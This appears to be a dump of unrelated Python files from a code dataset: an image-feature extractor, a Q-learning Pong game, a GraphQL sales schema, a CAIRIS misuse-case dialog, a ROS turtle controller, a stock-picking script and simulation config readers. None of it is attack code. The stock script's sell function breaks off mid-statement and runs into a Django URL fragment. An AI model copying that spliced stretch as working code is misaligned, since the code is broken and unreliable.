+{"seq_id":"631237660","text":"\"\"\"\nDefault settings for multitester\n\"\"\"\n\nimport time\nimport numpy as np\n\nimport mathmagic.fun as ff\n\nfrom mathmagic.datatypes import *\n\nspace = Space(edges=np.array([0,300,0,512],dtype=float),step=1)\nstart_pos = ff.cartesian_product(np.arange(50,250))\nplume_settings = {'path': 'collimated_2d', \n                  'params': {'width': 3.0, 'center': 150.0, 'mag': 0.017}, \n                  'src': np.array([-1, -1])}\nplume_fs = 1.\nsave_every = 1\nsave_file = '/Users/rkp/Desktop/' + time.strftime(\"%Y.%m.%d-%H.%M.%S\")\n \n# Default settings\nsettings = {}\n# Insect settings\nsettings['move_list'] = np.array([[1.,0],[-1,0],[0,1],[0,-1]])\nsettings['stay_in_grid'] = False\nsettings['stay_in_bounds'] = False\n# Sensor settings\nsettings['read_method'] = 'poisson'\nsettings['threshold'] = 0.\nsettings['visual_radius'] = 3.\n# Motor settings\nsettings['move_alg'] = 'max_util'\nsettings['max_speed'] = .4\n# Brain settings\nsettings['util_func'] = 'neg_ent'\ndef transform(util): return util - np.min(util)\nsettings['util_transform'] = {'fun':transform,'params':[]}\n# Tester settings\nsettings['stim_params'] = {'R': 1.,'tau':2500,'D':1.,'v':1.,'a':1.}\nsettings['hmm_filename'] = None\nsettings['plot_every'] = 0\nsettings['save_every'] = 0\nsettings['save_filename'] = time.strftime(\"%Y.%m.%d-%H.%M.%S\")\nsettings['calc_on_return'] = {'source_exist_prob':True}\nsettings['calc_on_save'] = {'source_prob':False,\n                            'source_log_like':False,\n                            'util':False,\n                            'util_approx':False,\n                            'move_prob_intr':False,\n                            'move_prob_combined':False}\n\n# Default approximations\napprox = {}\n# Insect approximation\n# Sensor approximations\n# Motor approximations\n# Brain approximation\napprox['mean_hit_rate_e'] = .0001\napprox['util_approx'] = None","sub_path":"wind_tunnel/old/infotaxis/config/default_multi.py","file_name":"default_multi.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"439713119","text":"from cv2 import cv2 \nimport selectivesearch\n\n\ndef sift(img_path):\n    img=cv2.imread(img_path)\n    _sift = cv2.xfeatures2d.SIFT_create()\n    key_point,descriptors=_sift.detectAndCompute(img,None)\n    print(len(key_point))\n    print(descriptors.shape)\n    return key_point,descriptors\n\n\ndef selective_search(img_path):\n    # https://github.com/AlpacaDB/selectivesearch\n    img=cv2.imread(img_path)\n    img_lbl, regions = selectivesearch.selective_search(img, scale=500, sigma=0.9, min_size=10)\n    # Create a set so elements are not duplicated; each element is a list (top-left x, top-left y, width, height) describing the bounding box of one candidate region\n    candidates = set()\n    for r in regions:\n        # skip duplicate candidate regions\n        if r['rect'] in candidates:\n            continue\n        # skip candidate regions smaller than 2000 pixels (the segment size, not the bounding-box area)\n        if r['size'] < 2000:\n            continue\n        # skip distorted bounding boxes, i.e. keep only roughly square ones\n        x, y, w, h = r['rect']\n        if w / h > 1.2 or h / w > 1.2:\n            continue\n        candidates.add(r['rect'])\n    img_regions=[]\n    for candidate in candidates:\n        x, y, w, h = candidate\n        img_regions.append(img[y:y+h, x:x+w])\n    return img_regions\n\n\n\nif __name__=='__main__':\n    img='1.jpg'\n    print(sift(img))\n    print(selective_search(img))\n","sub_path":"ExtractLocalDescriptors_new.py","file_name":"ExtractLocalDescriptors_new.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"313992100","text":"#!/usr/bin/env python\r\n#\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\r\n# GNU General Public License for more details.\r\n#\r\n#\t\tIt's my first actual game-making attempt. I know code could be much better \r\n#\t\twith classes or defs but I tried to make it short and understandable with very \r\n#\t\tlittle knowledge of python and pygame(I'm one of them). Enjoy.\r\n\r\nimport numpy as np\r\nimport math\r\nfrom random import randint\r\nimport random\r\nimport time\r\n#Game --------\r\nimport pygame\r\nfrom pygame.locals import *\r\nfrom sys import exit\r\nimport random\r\n\r\ndef discretize(b_x, b_y, v_x, v_y, p_y):\r\n    # Set vx_dis\r\n    vx_dis = 1 if (v_x>0) else -1\r\n    #Set vy_dis\r\n    if (v_y > 0.015):\r\n        vy_dis = 1\r\n    elif (v_y < -0.015):\r\n        vy_dis = -1\r\n    else:\r\n        vy_dis = 0\r\n    #Set bx_dis & by_dis\r\n    bx_dis = math.floor(b_x*grid_size)\r\n    if bx_dis == grid_size:\r\n        bx_dis = grid_size-1\r\n    by_dis = math.floor(b_y*grid_size)\r\n    if by_dis == grid_size:\r\n        by_dis = grid_size-1\r\n    #Set py_dis, the position of paddle in the grid\r\n    py_dis = math.floor(grid_size * p_y / (1 - p_h))\r\n    if (py_dis >= grid_size):\r\n        py_dis = grid_size-1\r\n    # print(bx_dis, by_dis, vx_dis, vy_dis, py_dis)\r\n    new_state = (bx_dis, by_dis, vx_dis, vy_dis, py_dis)\r\n    return new_state\r\n\r\n\r\ndef train():\r\n    #Initialization\r\n    gamma = 0.8 #Discount \r\n    decay = 0.9 #Decay constant\r\n    p_h = 0.2\r\n    grid_size = 12\r\n\r\n    Q = {}\r\n    # R = {}\r\n    N = {}\r\n    \r\n    #Init the R and Q\r\n    # actionCount = 0\r\n    for py_dis in range(grid_size):#paddle y\r\n        for vx_dis in [-1,1]:\r\n            for vy_dis in [-1,0,1]:\r\n                for bx_dis in range(grid_size):\r\n                    for by_dis in range(grid_size):\r\n                        t = (bx_dis, by_dis, vx_dis, vy_dis, py_dis)#Create tuple\r\n                        Q[t] = [0, 0, 0]\r\n                        N[t] = [0, 0, 0]\r\n    Q[(-1)] = 0\r\n    N[(-1)] = 0\r\n\r\n    #Begin training\r\n    trainCount = 5000 #100K\r\n    print(\"Train %d times for the pong game.\" % trainCount )\r\n    trainLoop = 0\r\n    Q_up = 0\r\n    epsilon = 1 # initial epsilon\r\n    while (trainLoop < trainCount):\r\n        print(trainLoop)\r\n        #initialize position\r\n        b_x = 0.5\r\n        b_y = 0.5\r\n        v_x = 0.03\r\n        v_y = 0.01\r\n        p_y = 0.5 - p_h/2 \r\n\r\n        cur_state = discretize(b_x, b_y, v_x, v_y, p_y)\r\n        \r\n        # while not fall\r\n        while (b_x <= 1):\r\n            action = -1\r\n            
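A quick way to sanity-check which proposals survive the filters in `selective_search` above is to draw them on the image; `x, y, w, h` follow the same `r['rect']` convention (top-left corner plus width and height):

```python
# Sketch: render the surviving candidate boxes onto a copy of the image.
import cv2

def draw_candidates(img, candidates, out_path='candidates.jpg'):
    vis = img.copy()
    for x, y, w, h in candidates:
        cv2.rectangle(vis, (x, y), (x + w, y + h), (0, 255, 0), 2)
    cv2.imwrite(out_path, vis)
```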
reward = 0\r\n score = random.random()\r\n # epsilon greedy to choose action\r\n if score < epsilon:\r\n action = random.randint(0,2)\r\n else:\r\n action = np.argmax(Q[cur_state])\r\n if action == 0:\r\n p_y = max(0.0, p_y - 0.04)\r\n elif action == 2:\r\n p_y = min(0.8, p_y + 0.04)\r\n\r\n N[cur_state][action] += 1\r\n # Update bx by vx vy to next state\r\n b_x += v_x\r\n b_y += v_y\r\n if (b_y < 0):\r\n b_y = -b_y\r\n v_y = -v_y\r\n if (b_y > 1):\r\n b_y = 2 - b_y\r\n v_y = -v_y\r\n if (b_x < 0):\r\n b_x = -b_x\r\n v_x = -v_x\r\n if b_x > 1:\r\n # if catch the ball\r\n if b_y >= p_y and b_y <= p_y + 0.2:\r\n reward = 1\r\n b_x = 2 - b_x\r\n U = random.uniform(-0.015, 0.015)\r\n V = random.uniform(-0.03, 0.03)\r\n if (-v_x + U > 0.03):\r\n v_x = 0.029\r\n elif (-v_x + U < -0.03):\r\n v_x = -0.029\r\n v_x = -v_x + U \r\n v_y = v_y + V\r\n\r\n next_state = discretize(b_x,b_y,v_x,v_y,p_y)\r\n \r\n if b_x > 1:\r\n reward = -1\r\n next_state = -1\r\n \r\n # print(next_state)\r\n\r\n LR = decay/(decay + N[cur_state][action])\r\n if next_state != -1:\r\n Q[cur_state][action] += LR*(reward + gamma*max(Q[next_state]) - Q[cur_state][action])\r\n else:\r\n Q[cur_state][action] += LR*(reward + gamma*Q[-1] - Q[cur_state][action])\r\n cur_state = next_state\r\n \r\n trainLoop += 1\r\n epsilon -= 1.0/trainCount\r\n print(\"Train ended.\")\r\n return Q\r\n\r\ndef game_one_run(Q, b_x, b_y, v_x, v_y, p_y):\r\n #Discrete current state \r\n bc = 0\r\n dis_state = discretize(b_x, b_y, v_x, v_y, p_y)\r\n # print(dis_state)\r\n #From Q find argmax action\r\n action = np.argmax(Q[dis_state])\r\n # print(action)\r\n #Update state & p_y according to selected action\r\n # Update bx by vx vy to next state\r\n b_x += v_x\r\n b_y += v_y\r\n\r\n if(action == 0):\r\n p_y = max(0.0, p_y - 0.04)\r\n elif action == 2:\r\n p_y = min(0.8, p_y + 0.04)\r\n if (b_y < 0):\r\n b_y = -b_y\r\n v_y = -v_y\r\n if (b_y > 1):\r\n b_y = 2 - b_y\r\n v_y = -v_y\r\n if (b_x < 0):\r\n b_x = -b_x\r\n v_x = -v_x\r\n if b_x > 1:\r\n # if catch the ball\r\n if b_y >= p_y and b_y <= p_y + 0.2:\r\n # print(\"Bounce %03f\" % b_x)\r\n print(\"Bounce\")\r\n bc = 1\r\n b_x = 2 - b_x\r\n U = random.uniform(-0.015, 0.015)\r\n V = random.uniform(-0.03, 0.03)\r\n if (-v_x + U > 0.03):\r\n v_x = 0.029\r\n elif (-v_x + U < -0.03):\r\n v_x = -0.029\r\n v_x = -v_x + U\r\n v_y = v_y + V\r\n b_x = 1\r\n # if failed to catch the ball\r\n else:\r\n return (-1, bc)\r\n\r\n return ((b_x, b_y, v_x, v_y, p_y),bc)\r\n\r\n\r\n\r\n\r\n#Game ==================================\r\nb_x = 0.5\r\nb_y = 0.5\r\nv_x = 0.03\r\nv_y = 0.01\r\np_y = 0.4\r\nscaleFactor = 640\r\ngrid_size = 12\r\np_h = 0.2\r\n\r\nQ = train()\r\n\r\nprint(\"Game start!\")\r\n\r\npygame.init()\r\n\r\nscreen=pygame.display.set_mode((640,640),0,32)#[screen_width,screen_height]\r\npygame.display.set_caption(\"The Ultimate Pong\")\r\n\r\n#Creating 2 bars, a ball and background.\r\nback = pygame.Surface((640,640))\r\nbackground = back.convert()\r\nbackground.fill((255,255,255))\r\nbar = pygame.Surface((10,128))#10 by 50 pixels, 25\r\n# bar1 = bar.convert()\r\n# bar1.fill((0,0,255))\r\nbar2 = bar.convert()\r\nbar2.fill((255,0,0))\r\ncirc_sur = pygame.Surface((15,15))\r\ncirc = pygame.draw.circle(circ_sur,(0,0,255),(7,7),7)\r\ncircle = circ_sur.convert()\r\ncircle.set_colorkey((0,0,0))\r\n\r\n# some definitions\r\nbar2_x = 630.\r\nbar2_y = 215.\r\ncircle_x, circle_y = 307.5, 307.5\r\nbar1_move, bar2_move = 0. 
, 0.\r\nspeed_circ = 250., 250., 250.\r\nbar1_score, bar2_score = 0,0\r\n#clock and font objects\r\nclock = pygame.time.Clock()\r\nfont = pygame.font.SysFont(\"Chalkboard\",80)\r\n\r\nspeed_x = 0.03\r\nspeed_y = 0.01\r\n# ai_speed = 0\r\n\r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n exit()\r\n # if event.type == KEYDOWN:\r\n # if event.key == K_UP:\r\n # bar1_move = -ai_speed\r\n # elif event.key == K_DOWN:\r\n # bar1_move = ai_speed\r\n # elif event.type == KEYUP:\r\n # if event.key == K_UP:\r\n # bar1_move = 0.\r\n # elif event.key == K_DOWN:\r\n # bar1_move = 0.\r\n \r\n # score1 = font.render(str(bar1_score), True, (255,255,255))\r\n score2 = font.render(str(bar2_score), True, (0,0,0))\r\n\r\n screen.blit(background,(0,0))\r\n frame = pygame.draw.rect(screen,(0,0,0),Rect((1,1),(639,639)),2)\r\n screen.blit(bar2,(bar2_x,bar2_y))\r\n screen.blit(circle,(circle_x,circle_y))\r\n screen.blit(score2,(320.,120.))\r\n \r\n# movement of circle\r\n time_passed = clock.tick(30)\r\n time_sec = time_passed / 1000.0\r\n circle_x = b_x * (scaleFactor-10)\r\n circle_y = b_y * scaleFactor\r\n bar2_y = p_y * scaleFactor\r\n\r\n (res, bc) = game_one_run(Q, b_x, b_y, v_x, v_y, p_y)\r\n bar2_score += bc\r\n if (res == -1):\r\n print (\"Game end, bounce: %d\" % bar2_score)\r\n time.sleep(3)\r\n bar2_x = 630.\r\n bar2_y = 215.\r\n circle_x, circle_y = 307.5, 307.5\r\n bar1_move, bar2_move = 0. , 0.\r\n speed_circ = 250., 250., 250.\r\n bar1_score, bar2_score = 0,0\r\n b_x = 0.5\r\n b_y = 0.5\r\n v_x = 0.03\r\n v_y = 0.01\r\n p_y = 0.4\r\n # break\r\n\r\n else:\r\n (b_x, b_y, v_x, v_y, p_y) = res\r\n\r\n\r\n#AI of the computer.\r\n \r\n # print(\"update\")\r\n pygame.display.update()\r\n# time.sleep(5)","sub_path":"mp4/pongGUI.py","file_name":"pongGUI.py","file_ext":"py","file_size_in_byte":9030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"314882042","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom graphene.utils.resolve_only_args import resolve_only_args\nfrom graphql import GraphQLError\nfrom graphql_jwt.decorators import login_required\n\nfrom healthid.apps.sales.models import (\n Sale, SaleDetail, SalesPrompt, SaleReturn, SaleReturnDetail)\n\nfrom healthid.utils.app_utils.database import get_model_object\nfrom healthid.utils.app_utils.pagination import pagination_query\nfrom healthid.utils.app_utils.pagination_defaults import PAGINATION_DEFAULT\nfrom healthid.utils.auth_utils.decorator import user_permission\nfrom healthid.utils.messages.sales_responses import SALES_ERROR_RESPONSES\n\n\nclass SalesPromptType(DjangoObjectType):\n class Meta:\n model = SalesPrompt\n\n\nclass SaleDetailType(DjangoObjectType):\n class Meta:\n model = SaleDetail\n\n\nclass SaleType(DjangoObjectType):\n register_id = graphene.Int(source='get_default_register')\n\n class Meta:\n model = Sale\n interfaces = (graphene.relay.Node,)\n\n id = graphene.ID(required=True)\n\n @resolve_only_args\n def resolve_id(self):\n return self.id\n\n\nclass ConsultationPaymentType(DjangoObjectType):\n\n class Meta:\n model = Sale\n\n\nclass SaleReturnType(DjangoObjectType):\n\n class Meta:\n model = SaleReturn\n\n\nclass SaleReturnDetailType(DjangoObjectType):\n class Meta:\n model = SaleReturnDetail\n\n\nclass Query(graphene.ObjectType):\n \"\"\"\n Return a list of sales prompt.\n Or return a single sales prompt specified.\n \"\"\"\n\n sales_prompts = graphene.List(SalesPromptType)\n sales_prompt = 
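The pong training loop above is standard tabular Q-learning with a visit-count learning rate LR = decay/(decay + N[s][a]). The same update pulled out as a helper, for clarity; a sketch mirroring the loop, where s_next == -1 marks the terminal state:

```python
def q_update(Q, N, s, a, reward, s_next, gamma=0.8, decay=0.9):
    # One tabular Q-learning step with a visit-count learning rate,
    # matching Q[s][a] += LR*(reward + gamma*max(Q[s']) - Q[s][a]) above.
    N[s][a] += 1
    lr = decay / (decay + N[s][a])
    target = reward + gamma * (Q[-1] if s_next == -1 else max(Q[s_next]))
    Q[s][a] += lr * (target - Q[s][a])
```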
graphene.Field(SalesPromptType, id=graphene.Int())\n\n outlet_sales_history = graphene.List(SaleType,\n outlet_id=graphene.Int(required=True),\n search=graphene.String(),\n page_count=graphene.Int(),\n page_number=graphene.Int())\n all_sales_history = graphene.List(SaleType,\n page_count=graphene.Int(),\n page_number=graphene.Int())\n\n sale_history = graphene.Field(\n SaleType, sale_id=graphene.Int(required=True))\n\n @login_required\n @user_permission('Manager')\n def resolve_sales_prompts(self, info, **kwargs):\n return SalesPrompt.objects.all()\n\n @login_required\n @user_permission('Manager')\n def resolve_sales_prompt(self, info, **kwargs):\n id = kwargs.get('id')\n sales_prompt = get_model_object(SalesPrompt, 'id', id)\n return sales_prompt\n\n @login_required\n def resolve_outlet_sales_history(self, info, **kwargs):\n page_count = kwargs.get('page_count')\n page_number = kwargs.get('page_number')\n search = kwargs.get('search')\n outlet_id = kwargs.get('outlet_id')\n\n sale = Sale()\n resolved_value = sale.sales_history(\n outlet_id=outlet_id, search=search)\n\n if page_count or page_number:\n sales = pagination_query(\n resolved_value, page_count, page_number)\n Query.pagination_result = sales\n return sales[0]\n if resolved_value:\n paginated_response = pagination_query(resolved_value,\n PAGINATION_DEFAULT[\n \"page_count\"],\n PAGINATION_DEFAULT[\n \"page_number\"])\n\n Query.pagination_result = paginated_response\n return paginated_response[0]\n return GraphQLError(SALES_ERROR_RESPONSES[\"no_sales_error\"])\n\n @login_required\n def resolve_sale_history(self, info, sale_id):\n sale = get_model_object(Sale, 'id', sale_id)\n return sale\n\n @login_required\n @user_permission('Manager')\n def resolve_all_sales_history(self, info, **kwargs):\n page_count = kwargs.get('page_count')\n page_number = kwargs.get('page_number')\n\n resolved_value = Sale.objects.all()\n\n if page_count or page_number:\n sales = pagination_query(\n resolved_value, page_count, page_number)\n Query.pagination_result = sales\n return sales[0]\n if resolved_value:\n paginated_response = pagination_query(resolved_value,\n PAGINATION_DEFAULT[\n \"page_count\"],\n PAGINATION_DEFAULT[\n \"page_number\"])\n\n Query.pagination_result = paginated_response\n return paginated_response[0]\n return GraphQLError(SALES_ERROR_RESPONSES[\"no_sales_error\"])\n","sub_path":"healthid/apps/sales/schema/sales_schema.py","file_name":"sales_schema.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"513717656","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
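`resolve_outlet_sales_history` and `resolve_all_sales_history` above repeat the same paginate-or-default tail. A sketch of a shared helper built only from the module's own imports (`pagination_query`, `PAGINATION_DEFAULT`, `SALES_ERROR_RESPONSES`, `GraphQLError`); the helper name is illustrative:

```python
def paginate_or_error(queryset, page_count, page_number):
    # Shared tail for the two history resolvers above (sketch).
    if page_count or page_number:
        result = pagination_query(queryset, page_count, page_number)
    elif queryset:
        result = pagination_query(queryset,
                                  PAGINATION_DEFAULT["page_count"],
                                  PAGINATION_DEFAULT["page_number"])
    else:
        return GraphQLError(SALES_ERROR_RESPONSES["no_sales_error"])
    Query.pagination_result = result
    return result[0]
```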
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport sys\nimport gtk\nfrom Borg import Borg\nfrom NDImplementationDecorator import NDImplementationDecorator\n\n\nclass MisuseCaseNodeDialog:\n def __init__(self,objt,environmentName,dupProperty,overridingEnvironment,builder):\n self.window = builder.get_object(\"MisuseCaseNodeDialog\")\n self.decorator = NDImplementationDecorator(builder)\n self.decorator.updateTextCtrl(\"misuseCaseNameCtrl\",objt.name())\n\n b = Borg()\n proxy = b.dbProxy\n environmentId = proxy.getDimensionId(environmentName,'environment')\n threatName,vulName = proxy.riskComponents(objt.risk())\n\n threatId = proxy.getDimensionId(threatName,'threat')\n vulId = proxy.getDimensionId(vulName,'vulnerability')\n self.decorator.updateTextCtrl(\"misuseCaseThreatCtrl\",threatName)\n self.decorator.updateTextCtrl(\"misuseCaseLikelihoodCtrl\",proxy.threatLikelihood(threatId,environmentId))\n self.decorator.updateTextCtrl(\"misuseCaseVulnerabilityCtrl\",vulName)\n self.decorator.updateTextCtrl(\"misuseCaseSeverityCtrl\",proxy.vulnerabilitySeverity(vulId,environmentId))\n self.decorator.updateTextCtrl(\"misuseCaseRiskRatingCtrl\",proxy.riskRating(threatName,vulName,environmentName))\n\n attackers = proxy.threatAttackers(threatId,environmentId)\n attackerSet = set(attackers)\n attackers = []\n for attacker in attackerSet:\n attackers.append([attacker])\n self.decorator.updateListCtrl(\"misuseCaseAttackersCtrl\",['Attacker'],gtk.ListStore(str),attackers)\n\n threatenedAssets = proxy.threatenedAssets(threatId,environmentId)\n vulnerableAssets = proxy.vulnerableAssets(vulId,environmentId)\n assetSet = set(threatenedAssets + vulnerableAssets)\n assets = []\n for asset in assetSet:\n assets.append([asset])\n self.decorator.updateListCtrl(\"misuseCaseAssetsCtrl\",['Asset'],gtk.ListStore(str),assets)\n\n self.decorator.updateMLTextCtrl(\"misuseCaseNarrativeCtrl\",objt.narrative(environmentName,dupProperty))\n\n objectiveText = 'Exploit vulnerabilities in '\n for idx,vulAsset in enumerate(vulnerableAssets):\n objectiveText += vulAsset\n if (idx != (len(vulnerableAssets) -1)):\n objectiveText += ','\n objectiveText += ' to threaten '\n for idx,thrAsset in enumerate(threatenedAssets):\n objectiveText += thrAsset\n if (idx != (len(threatenedAssets) -1)):\n objectiveText += ','\n objectiveText += '.'\n self.decorator.updateTextCtrl(\"misuseCaseObjectiveCtrl\",objectiveText)\n\n\n self.window.resize(350,100)\n\n def on_misuseCaseOkButton_clicked(self,callback_data):\n self.window.destroy()\n\n def show(self):\n self.window.show()\n","sub_path":"cairis/cairis/MisuseCaseNodeDialog.py","file_name":"MisuseCaseNodeDialog.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354040361","text":"#!/usr/bin/env python\n\nimport rospy,math,sys\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nclass Turtle():\n def __init__(self,name,max_linear,max_steer,target):\n self.max_steer = max_steer\n self.max_linear = max_linear\n self.target = target\n self.name = name\n self.pub = rospy.Publisher(\"/{}/cmd_vel\".format(self.name),Twist,queue_size=10) \n \n def subscriber(self):\n self.sub = rospy.Subscriber(\"/{}/pose\".format(self.name),Pose,self.move)\n rospy.spin()\n\n def move(self,msg):\n dx = self.target[0]-msg.x; dy = self.target[1]-msg.y # Calculates vector_towards_target\n mov = Twist()\n if((dx**2+dy**2)**0.5<=0.1): #If 
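The `objectiveText` assembly in the dialog above tracks list indices by hand just to place commas; `str.join` builds the same sentence (keeping the record's no-space comma convention):

```python
# Equivalent objective sentence via join (sketch):
objectiveText = 'Exploit vulnerabilities in {} to threaten {}.'.format(
    ','.join(vulnerableAssets), ','.join(threatenedAssets))
```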
arrived\n mov.linear.x = 0\n mov.angular.z = 0\n self.pub.publish(mov)\n rospy.loginfo(\"\"\"\nArrived at:\n x: {}\n y: {}\ntheta: {}\n \"\"\".format(msg.x,msg.y,msg.theta))\n rospy.signal_shutdown(\"ARRIVED\")\n else:\n dabs = (dx**2+dy**2)**0.5 #Calculate |vector_towards_target|\n self.desired = (dx/dabs,dy/dabs) #Assign as tuple\n steer_factor = (math.cos(msg.theta)*self.desired[1]-math.sin(msg.theta)*self.desired[0]) #Calculate steer factor based on the turtle theta angle and the vector_towards_target\n mov.linear.x = (1-abs(steer_factor))*self.max_linear #To lower the path, linear vel is small when angular vel is high\n mov.angular.z = steer_factor*self.max_steer\n self.pub.publish(mov)\n\nif __name__ == \"__main__\":\n rospy.init_node(\"path_planning\")\n if(len(sys.argv)==3): #Check arguments\n if(float(sys.argv[1])>=0 and float(sys.argv[1])<=11 and float(sys.argv[2])>=0 and float(sys.argv[2])<=11): #Check coordinates values\n t1 = Turtle(\"turtle1\",2,4,(float(sys.argv[1]),float(sys.argv[2])))\n rospy.loginfo(\"Ready!\")\n t1.subscriber()\n else: rospy.loginfo(\" WARNING: 0 <= x,y <= 11\")\n else:\n rospy.loginfo(\"Assign: x y (Destiny coordinates)\")\n \n\n \n\n\n","sub_path":"turtle_challenge/src/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"288182573","text":"from home.listofstockscrypto import *\nfrom home.aiscripts import *\nfrom home.financepi import *\nfrom home.medai import *\nimport math\nimport random\n\ndef getBuy_hard(buyingPower):\n\tlist = getDow()\n\thi_score = -10000000\n\thi_item = 'blank'\n\tfor item in list:\n\t\tpos, neg, neut, tnum = getTwitterSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif tnum == 0:\n\t\t\ttwit_score = 1\n\t\telse:\n\t\t\ttwit_score = pos/neg\n\t\t\n\t\tdata = getLastMonth(item)\n\t\t[w,b,loss] = runLinearReg(data)\n\t\tlinreg_score = w*1000/loss\n\t\t\n\t\tpos, neg, neut, lnum = getNewsSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif lnum == 0:\n\t\t\tnews_score = 1\n\t\telse:\n\t\t\tnews_score = pos/neg\n\t\t\n\t\ttot_score = twit_score*linreg_score*news_score\n\t\tif tot_score>hi_score:\n\t\t\thi_score = tot_score\n\t\t\thi_item = item\n\tprice = getPriceFromAPI(hi_item, False)\n\trangeNumToBuy = math.floor(abs(0.25*float(buyingPower)/float(price)))\n\trandBuyNum = random.randint(1, rangeNumToBuy)\n\treturn [hi_item, randBuyNum]\n\t\ndef getSell_hard(currAssets, currAmts):\n\tif not currAssets:\n\t\treturn 'none123', 0\n\tlo_score = 1000000000\n\tlo_item = 'blank'\n\tindex = 0\n\tlo_index = 0\n\tfor item in currAssets:\n\t\tpos, neg, neut, tnum = getTwitterSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif tnum == 0:\n\t\t\ttwit_score = 1\n\t\telse:\n\t\t\ttwit_score = pos/neg\n\t\t\n\t\tdata = getLastMonth(item)\n\t\t[w,b,loss] = runLinearReg(data)\n\t\tlinreg_score = w*1000/loss\n\t\t\n\t\tpos, neg, neut, lnum = getNewsSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif lnum == 0:\n\t\t\tnews_score = 1\n\t\telse:\n\t\t\tnews_score = pos/neg\n\t\t\n\t\ttot_score = twit_score*linreg_score*news_score\n\t\tif tot_score.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n ) if settings.DEBUG else urlpatterns\n","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494962885","text":"# Tools for pre- and 
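The `steer_factor` in the turtle's `move()` above, cos(theta)*dy_hat - sin(theta)*dx_hat, is the z-component of the cross product between the heading vector (cos theta, sin theta) and the unit vector towards the target, i.e. the sine of the heading error, so a positive value means the target lies to the left. The full signed error, for comparison, is atan2(cross, dot):

```python
import math

def signed_heading_error(theta, dx, dy):
    # Angle from the heading (cos theta, sin theta) to the target direction,
    # in (-pi, pi]; its sine is exactly the steer_factor used above.
    cross = math.cos(theta) * dy - math.sin(theta) * dx
    dot = math.cos(theta) * dx + math.sin(theta) * dy
    return math.atan2(cross, dot)
```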
post-processing AFiD data\n\nimport h5py\nimport numpy as np\n\nclass Grid:\n \"\"\"\n Class containing the coordinates of all grids used in the simulation\n \"\"\"\n def __init__(self, folder):\n with h5py.File(folder+\"/outputdir/cordin_info.h5\",\"r\") as f:\n self.xm = f[\"xm\"][()]\n self.xc = f[\"xc\"][()]\n self.ym = f[\"ym\"][()]\n self.zm = f[\"zm\"][()]\n if \"xmr\" in list(f.keys()):\n self.xmr = f[\"xmr\"][()]\n self.xcr = f[\"xcr\"][()]\n self.ymr = f[\"ymr\"][()]\n self.zmr = f[\"zmr\"][()]\n else:\n self.xmr, self.xcr = np.array([]), np.array([])\n self.ymr, self.zmr = np.array([]), np.array([])\n if self.ym.size > 1:\n dy = self.ym[1] - self.ym[0]\n self.yc = np.arange(0, dy*(self.ym.size+1), dy)\n else: self.yc = np.array([0, 2*self.ym[0]])\n if self.ymr.size > 1:\n dyr = self.ymr[1] - self.ymr[0]\n self.ycr = np.arange(0, dyr*(self.ymr.size+1), dyr)\n elif self.ymr.size==1:\n self.ycr = np.array([0,2*self.ymr[0]])\n else: self.ycr = []\n if self.zm.size > 1:\n dz = self.zm[1] - self.zm[0]\n self.zc = np.arange(0, dz*(self.zm.size+1), dz)\n else: self.zc = np.array([0, 2*self.zm[0]])\n if self.zmr.size > 1:\n dzr = self.zmr[1] - self.zmr[0]\n self.zcr = np.arange(0, dzr*(self.zmr.size+1), dzr)\n elif self.zmr.size==1:\n self.zcr = np.array([0,2*self.zmr[0]])\n else: self.zcr = []\n\nclass InputParams:\n \"\"\"\n Class containing the simulation parameters specified by\n the input file `bou.in`.\n \"\"\"\n def __init__(self, folder):\n fname = folder+\"/bou.in\"\n with open(fname,\"r\") as f:\n bou = f.readlines()\n if len(bou)==55:\n # Current format\n self.nxm, self.nym, self.nzm, self.nsst = [\n int(n) for n in bou[2].split()\n ]\n self.multires, self.nxmr, self.nymr, self.nzmr = [\n int(n) for n in bou[6].split()\n ]\n self.flagsal, self.flagpf = [\n n!=\"0\" for n in bou[10].split()\n ]\n self.tout, self.tframe = [\n float(n) for n in bou[22].split()[:2]\n ]\n self.save_3D = float(bou[22].split()[-1])\n self.alx3, self.ylen, self.zlen = [\n float(n) for n in bou[26].split()\n ]\n self.istr3 = int(bou[30].split()[0])\n self.str3 = 